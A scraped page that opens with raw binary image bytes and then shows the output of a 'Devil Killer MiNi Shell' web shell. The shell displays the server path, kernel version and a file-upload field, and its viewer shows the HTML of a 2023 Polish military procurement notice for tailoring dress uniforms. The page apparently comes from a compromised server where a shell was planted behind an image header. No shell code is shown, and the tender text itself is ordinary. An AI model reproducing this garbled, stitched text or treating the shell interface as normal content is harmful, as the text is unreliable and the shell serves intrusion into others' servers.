JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230725/0032372001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Szycie umundurowania wyjściowego na miarę. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">21 Wojskowy Oddział Gospodarczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 281385396</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kwiatkowskiego 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Elbląg</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">21wog@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://21wog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> 21 Wojskowy Oddział Gospodarczy </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Szycie umundurowania wyjściowego na miarę. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-073e7f11-2a15-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00323720</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00127407/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 SZYCIE UMUNDUROWANIA WYJŚCIOWEGO NA MIARĘ</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/21wog <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://21wog.wp.mil.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>wysyłania i odbierania dokumentów elektronicznych i informacji przekazywanych przy ich użyciu zostały opisane<br/>w Regulaminie korzystania z usług Systemu (Regulamin Portalu e-Usług) dostępnym z poziomu modułu E-learning dla wszystkich<br/>użytkowników Systemu oraz podczas rejestracji konta Wykonawcy dla Wykonawców</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://portal.smartpzp.pl/21wog</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) <br/>(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	Administratorem Pani/Pana danych osobowych jest 21 Wojskowy Oddział Gospodarczy w Elblągu, ul. Kwiatkowskiego 15, 82-300 Elbląg, e-mail: 21wog@ron.mil.pl;<br/>	Administrator wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować w sprawach związanych z danymi osobowymi pod adresem e-mail: 21wog@ron.mil.pl;<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „Szycie umundurowania wyjściowego na miarę” nr postępowania 39/SZP/2023;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania. <br/>	Pani/Pana dane osobowe będą przechowywane przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 5 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest <br/>art. 6 ust. 1 lit. c RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">j.w.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">39/SZP/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 1 - Szycie umundurowania sił powietrznych - dla ilości minimalnych<br/>Lp. Nazwa Jm Ilość<br/>1. Płaszcz damski sił powietrznych – WDTT 215D/MON szt. 8<br/>2. Bluza olimpijka damska sił powietrznych – WDTT 116D/MON szt. 8<br/>3. Mundur galowy damski (ze spódnicą) sił powietrznych – WDTT 108D/MON kpl. 8<br/>4. Mundur wyjściowy damski (ze spódnicą) sił powietrznych – WDTT 136/MON kpl. 8<br/>5. Spodnie wyjściowe letnie damskie sił powietrznych – WDTT 112DL/MON szt. 8<br/>6. Spodnie wyjściowe damskie sił powietrznych – WDTT 112D/MON szt. 8<br/>7. Koszulo-bluza damska z krótkimi rękawami koloru stalowego – WDTT 301D/MON szt. 16<br/>8. Koszulo-bluza damska z długimi rękawami koloru stalowego – WDTT 310D/MON szt. 16<br/>9. Płaszcz sił powietrznych – WDTT 215/MON szt. 3<br/>10. Mundur galowy sił powietrznych – WDTT 108/MON kpl. 3<br/>11. Mundur wyjściowy sił powietrznych – WDTT 102/MON kpl. 4<br/>Zadanie nr 1 - Szycie umundurowania sił powietrznych - dla ilości maksymalnych<br/>Lp. Nazwa Jm Ilość<br/>1. Płaszcz damski sił powietrznych – WDTT 215D/MON szt. 16<br/>2. Bluza olimpijka damska sił powietrznych – WDTT 116D/MON szt. 16<br/>3. Mundur galowy damski (ze spódnicą) sił powietrznych – WDTT 108D/MON kpl. 16<br/>4. Mundur wyjściowy damski (ze spódnicą) sił powietrznych – WDTT 136/MON kpl. 16<br/>5. Spodnie wyjściowe letnie damskie sił powietrznych – WDTT 112DL/MON szt. 16<br/>6. Spodnie wyjściowe damskie sił powietrznych – WDTT 112D/MON szt. 16<br/>7. Koszulo-bluza damska z krótkimi rękawami koloru stalowego – WDTT 301D/MON szt. 32<br/>8. Koszulo-bluza damska z długimi rękawami koloru stalowego – WDTT 310D/MON szt. 32<br/>9. Płaszcz sił powietrznych – WDTT 215/MON szt. 6<br/>10. Mundur galowy sił powietrznych – WDTT 108/MON kpl. 6<br/>11. Mundur wyjściowy sił powietrznych – WDTT 102/MON kpl. 8 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98393000-4 - Usługi krawieckie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Umowa przewiduje wykorzystanie przez Zamawiającego prawa opcji. Opcja polega na powtórzeniu tego samego<br/>asortymentu dla ilości maksymalnych określonych w SWZ.<br/>2. Realizację ilości minimalnych, Zamawiający gwarantuje w całości.<br/>3. Ilości maksymalne, stanowiące górną granicę potrzeb Zamawiającego, (będące opcją) są określone w załączniku nr 1 do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty w części zamówienia nr 1 Zamawiający będzie się kierował<br/>następującymi kryteriami:<br/>1) Cena brutto oferty dla ilości minimalnych - 60%<br/>2) Okres gwarancji - 40%<br/>2. W kryterium K1 - „Cena brutto oferty dla ilości minimalnych” zostanie zastosowany wzór:<br/>najniższa oferowana cena brutto dla ilości minimalnych<br/>Liczba punktów = ------------------------------------------- x 100 pkt x 60%<br/>cena brutto oferty badanej<br/>3. W kryterium K2 - „okres gwarancji ” zostanie zastosowany sposób oceny ofert:<br/>WARIANT I Gwarancja 12 miesięcy 0 pkt<br/>WARIANT II Gwarancja 24 miesięcy 20 pkt<br/>WARIANT III Gwarancja 36 miesięcy 30 pkt<br/>WARIANT IV Gwarancja 48 miesięcy 40 pkt<br/> Zaznaczenie więcej niż jednej rubryki przez Wykonawcę w formularzu ofertowym spowoduje odrzucenie oferty;<br/> W przypadku braku zaznaczenia rubryki przez Wykonawcę w formularzu ofertowym, Zamawiający uzna, że Wykonawca<br/>zadeklarował 12 miesięczny okres gwarancji i otrzyma 0 pkt w kryterium „okres gwarancji”.<br/>4. Liczba punktów uzyskanych przez daną ofertę będzie wyliczana wg. wzoru:<br/>P = K1 + K2<br/>P - liczba punktów uzyskanych przez daną ofertę<br/>K1 - liczba punktów uzyskanych przez daną ofertę w kryterium „Cena brutto oferty dla ilości minimalnych’’<br/>K2 - liczba punktów uzyskanych przez daną ofertę w kryterium „Czas reakcji‘’<br/>5. Oferta będzie podlegać ocenie dla każdej części zamówienia. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku.<br/>Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>6. Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna<br/>liczba punktów, jaką może osiągnąć oferta wynosi 100.<br/>7. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 2 - Szycie umundurowania wojsk lądowych - dla ilości minimalnych.<br/>Lp. Nazwa Jm Ilość<br/>1. Koszula damska koloru białego – WDTT 303D/MON szt. 8<br/>2. Mundur galowy wojsk lądowych – WDTT 108/MON kpl. 8<br/>3. Mundur wyjściowy wojsk lądowych – WDTT 101/MON kpl. 6<br/>4. Płaszcz wojsk lądowych – WDTT 215/MON szt. 4<br/>5. Mundur galowy damski (ze spódnicą) wojsk lądowych – WDTT 108D/MON kpl. 6<br/>6. Mundur wyjściowy damski (ze spódnicą) wojsk lądowych – WDTT 136/MON kpl. 6<br/>7. Płaszcz damski wojsk lądowych – WDTT 215D/MON szt. 6<br/>8. Spodnie wyjściowe letnie damskie wojsk lądowych – WDTT 112 DL/MON szt. 1<br/>9. Spodnie wyjściowe letnie wojsk lądowych – WDTT 112L/MON szt. 1<br/>Zadanie nr 2 - Szycie umundurowania wojsk lądowych - dla ilości maksymalnych.<br/>Lp. Nazwa Jm Ilość<br/>1. Koszula damska koloru białego – WDTT 303D/MON szt. 16<br/>2. Mundur galowy wojsk lądowych – WDTT 108/MON kpl. 16<br/>3. Mundur wyjściowy wojsk lądowych – WDTT 101/MON kpl. 12<br/>4. Płaszcz wojsk lądowych – WDTT 215/MON szt. 8<br/>5. Mundur galowy damski (ze spódnicą) wojsk lądowych – WDTT 108D/MON kpl. 12<br/><br/>6. Mundur wyjściowy damski (ze spódnicą) wojsk lądowych – WDTT 136/MON kpl. 12<br/>7. Płaszcz damski wojsk lądowych – WDTT 215D/MON szt. 12<br/>8. Spodnie wyjściowe letnie damskie wojsk lądowych - WDTT szt. 2<br/>9. Spodnie wyjściowe letnie wojsk lądowych - WDTT szt. 2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98393000-4 - Usługi krawieckie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Umowa przewiduje wykorzystanie przez Zamawiającego prawa opcji. Opcja polega na powtórzeniu tego samego<br/>asortymentu dla ilości maksymalnych określonych w SWZ.<br/>2. Realizację ilości minimalnych, Zamawiający gwarantuje w całości.<br/>3. Ilości maksymalne, stanowiące górną granicę potrzeb Zamawiającego, (będące opcją) są określone w załączniku nr 1 do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty w części zamówienia nr 2 Zamawiający będzie się kierował<br/>następującymi kryteriami:<br/>1) Cena brutto oferty dla ilości minimalnych - 60%<br/>2) Okres gwarancji - 40%<br/>2. W kryterium K1 - „Cena brutto oferty dla ilości minimalnych” zostanie zastosowany wzór:<br/>najniższa oferowana cena brutto dla ilości minimalnych<br/>Liczba punktów = ------------------------------------------- x 100 pkt x 60%<br/>cena brutto oferty badanej<br/>3. W kryterium K2 - „okres gwarancji ” zostanie zastosowany sposób oceny ofert:<br/>WARIANT I Gwarancja 12 miesięcy 0 pkt<br/>WARIANT II Gwarancja 24 miesięcy 20 pkt<br/>WARIANT III Gwarancja 36 miesięcy 30 pkt<br/>WARIANT IV Gwarancja 48 miesięcy 40 pkt<br/> Zaznaczenie więcej niż jednej rubryki przez Wykonawcę w formularzu ofertowym spowoduje odrzucenie oferty;<br/> W przypadku braku zaznaczenia rubryki przez Wykonawcę w formularzu ofertowym, Zamawiający uzna, że Wykonawca<br/>zadeklarował 12 miesięczny okres gwarancji i otrzyma 0 pkt w kryterium „okres gwarancji”.<br/>4. Liczba punktów uzyskanych przez daną ofertę będzie wyliczana wg. wzoru:<br/>P = K1 + K2<br/>P - liczba punktów uzyskanych przez daną ofertę<br/>K1 - liczba punktów uzyskanych przez daną ofertę w kryterium „Cena brutto oferty dla ilości minimalnych’’<br/>K2 - liczba punktów uzyskanych przez daną ofertę w kryterium „Czas reakcji‘’<br/>5. Oferta będzie podlegać ocenie dla każdej części zamówienia. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku.<br/>Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>6. Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna<br/>liczba punktów, jaką może osiągnąć oferta wynosi 100.<br/>7. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie precyzuje warunku udziału w postępowaniu.<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>Zamawiający nie precyzuje warunku udziału w postępowaniu.<br/>c) zdolności ekonomicznej lub finansowej<br/>Zamawiający nie precyzuje warunku udziału w postępowaniu.<br/>d) zdolności technicznej lub zawodowej<br/>1) posiadania zaświadczenia wydanego przez Komendanta WOBWSM /Wojskowy Ośrodek Badawczo-Wdrożeniowy Służby<br/>Mundurowej/, jako podmiotu uprawnionego do oceny zgodności i kontroli jakości, o posiadaniu wzoru zakładowego wyrobu<br/>(PUiW) zgodnego w dniu uruchomienia postępowania o udzielenie zamówienia publicznego WDTT i wzorem do produkcji<br/>seryjnej (z datą wystawienia późniejszą od daty zatwierdzenia WDTT lub WTU),<br/>2) posiadania certyfikatu wystawionego przez jednostkę certyfikującą na dostawy PUiW, które podlegają ocenie zgodności<br/>w trybie III zgodnie z rozporządzeniem Ministra Obrony Narodowejz dnia 11 stycznia 2013 r. w sprawie szczegółowego<br/>wykazu wyrobów podlegających ocenie zgodności oraz sposobu i trybu przeprowadzenia oceny zgodności 